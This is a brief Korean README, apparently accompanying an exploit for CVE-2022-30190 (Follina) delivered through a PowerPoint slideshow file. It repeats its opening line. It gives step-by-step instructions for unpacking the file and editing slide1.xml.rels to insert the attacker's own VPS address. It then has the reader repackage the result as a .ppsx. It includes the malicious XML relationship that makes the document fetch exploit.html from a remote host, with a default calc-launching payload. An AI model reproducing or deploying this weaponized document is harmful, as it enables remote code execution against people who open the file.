
이것은 PowerPoint에서 CVE-2022-30190을 악용하는 익스플로잇입니다.
이것은 PowerPoint에서 CVE-2022-30190을 악용하는 익스플로잇입니다.
파일의 확장자를 'zip'으로 변경하고 압축을 풀면 \ppt\slides\_rels\slide1.xml.rels를 편집할 수 있습니다. 이 파일에서 자신의 VPS IP:포트로 다음과 같이 교체한 다음, 원래 방식대로 다시 압축하고 확장자를 'ppsx'로 변경합니다. 'exploit.html'의 기본 페이로드는 calc를 실행하는 것입니다.
<Relationship TargetMode="External" Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>